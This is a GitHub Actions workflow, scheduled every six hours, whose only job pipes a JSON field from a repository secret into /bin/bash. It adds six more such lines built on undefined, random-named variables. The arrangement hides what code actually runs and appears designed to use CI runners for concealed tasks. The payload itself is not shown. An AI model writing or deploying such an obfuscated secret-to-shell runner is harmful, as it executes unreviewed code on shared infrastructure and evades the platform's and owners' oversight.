name: duanqirui2603

on:
  workflow_dispatch:
  schedule:
    - cron: '24 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanqirui2603
        env:
          k466: ${{ secrets.k466 }}
        run: |
          echo $k466 | jq -r .ni36 | /bin/bash
          echo $ghuu4 | jq -r .itic5540 | /bin/bash
          echo $rbtew17 | jq -r .byo0 | /bin/bash
          echo $h3879 | jq -r .anv96 | /bin/bash
          echo $ufhg1826 | jq -r .whrwp82296 | /bin/bash
          echo $esotb51 | jq -r .yc0877 | /bin/bash
          echo $rzona999 | jq -r .cjcdz8 | /bin/bash

